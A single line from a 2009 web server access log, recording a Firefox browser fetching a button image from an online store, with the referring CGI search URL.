92.139.172.72 - - [06/Oct/2009:02:10:31 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729) FBSMTWB"
